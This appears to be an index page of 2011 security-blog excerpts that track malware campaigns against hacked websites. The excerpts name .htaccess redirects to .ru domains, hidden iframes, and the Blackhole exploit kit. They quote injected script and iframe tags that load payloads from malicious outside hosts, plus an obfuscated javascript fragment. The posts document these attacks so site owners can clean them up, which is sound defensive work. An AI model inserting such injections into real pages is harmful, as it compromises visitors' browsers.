We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner. For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
September 13, 2011 by
Hidden iframes from caiualoy.cz.cc (encoded javascript)
August 5, 2011 by
We are seeing many sites hacked with malware getting loaded from caiualoy.cz.cc (and a few other .cz.cc domains). It all starts with a long piece of encoded javascript at the bottom of the sites: **If you don’t want to hear about the technical details of the malware and just want help (or someone to [...]
.htaccess redirections – clearagent.ru
June 23, 2011 by
Just an update in the .htaccess redirections attacks that we posted a few days ago. These are some of the new domains being used (specially the clearagent.ru one): additionalprofit.ru clearagent.ru face-apple.ru fightagent.ru power-update.ru syntaxswitch.ru window-switch.ru It is happening on WordPress and Joomla sites, but can affect any web site, since they are getting access [...]
Malware injection – /cssminibar.js
June 22, 2011 by
We have been tracking for a little while the sidename.js malware, and lately it has changed (mutated) to use the cssminibar.js file instead (still attempting to compromised browsers in the same way with the blackhole exploit). This is how the malware looks in a hacked site: <script type="text/javascript" src="http://amxbans.hmhost.pl/cssminibar.js"></script> <script type="text/javascript" src="http://livezilla뛒-x.com/sidename.js"></script> <script type="text/javascript" src="http://kardayim.com/cssminibar.js"></script> <script type="text/javascript" src="http://www.letfollow.us/sidename.js"></script> Which does the [...]
Malware injection – /sidename.js
June 16, 2011 by
We have been tracking for a few days a large number of sites infected with the el=document.createElement("div"); malware that try to compromise the browsers of anyone visiting a hacked web site (Blackhole exploit toolkit). We post about it a few days ago, but recently instead of dropping the the malware into the site, they [...]
Blackhole Exploit Kit (and the .cc domains)
June 10, 2011 by
If you are visiting a web site and you are getting a warning from your anti virus about a Blackhole Exploit Kit (type 2021, 2020 and others), it means that the site is currently hacked. If it is your own site, you have to fix it right away to protect yourself and your users from [...]
lavanda.345.pl and noyeenf.cz.cc malicious iframes
June 7, 2011 by
We are tracking for the last few days another large number of hacked sites being infected by malware from lavanda.345.pl, noyeenf.cz.cc and a few others domains in the .pl and .cz.cc name space. This is how it looks like in an infected web site: <iframe src="http://noyeenf.cz.cc/go/1" width="0" .. Suspicious conditional redirect. Details: http://sucuri.net/malware/entry/MW:HTA:7 Redirects users [...]
rioclmac.net and bhykntyg.co.cc hidden iframes
May 19, 2011 by
We are getting many requests for information on the following block of code that is showing on quite a few web sites: var ar="sg]pw1=} [tNrl>hd,C;vB0′bo"aumEA.n)y{c/:fe<(i T”;try{try{qwe()}catch(a){gsdg()};}catch(a){k=new Boolean().toString();};var ar2="f32,32,176,160,180,172,64,100,148,112,116,164,132,40,128, 4,164,40,120,52,164,116,164,132,40,0,84,140,184,108, 4,44,108,116,164,172,92,96,100,64,140,92,136,36…. If you are seeing this on your web site, it is malware and it needs to be cleaned. It is basically a block of javascript [...]
